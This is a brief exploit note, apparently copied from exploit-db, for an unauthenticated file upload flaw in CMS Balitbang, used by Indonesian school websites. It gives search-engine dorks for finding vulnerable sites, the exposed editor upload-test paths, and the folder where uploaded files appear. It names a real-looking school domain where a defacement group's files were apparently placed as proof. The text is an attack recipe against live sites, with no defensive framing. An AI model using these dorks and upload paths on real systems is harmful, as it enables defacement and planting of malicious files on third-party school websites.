CMS Balitbang File Upload: Old but Still Valid



Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"



editor/filemanager/connectors/uploadtest.html
editor/filemanager/connectors/test.html


http://www.target.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.target.sch.id/editor/filemanager/connectors/test.html



http://www.target.sch.id/userfiles/file/file.txt




text => http://www.sman1gombong.sch.id/userfiles/file/imcyber-team.txt
image => http://www.sman1gombong.sch.id/userfiles/image/indramayucyberteam.jpg


This article is not exactly the same as the original, because the original is harder to understand. Courtesy of exploit-db
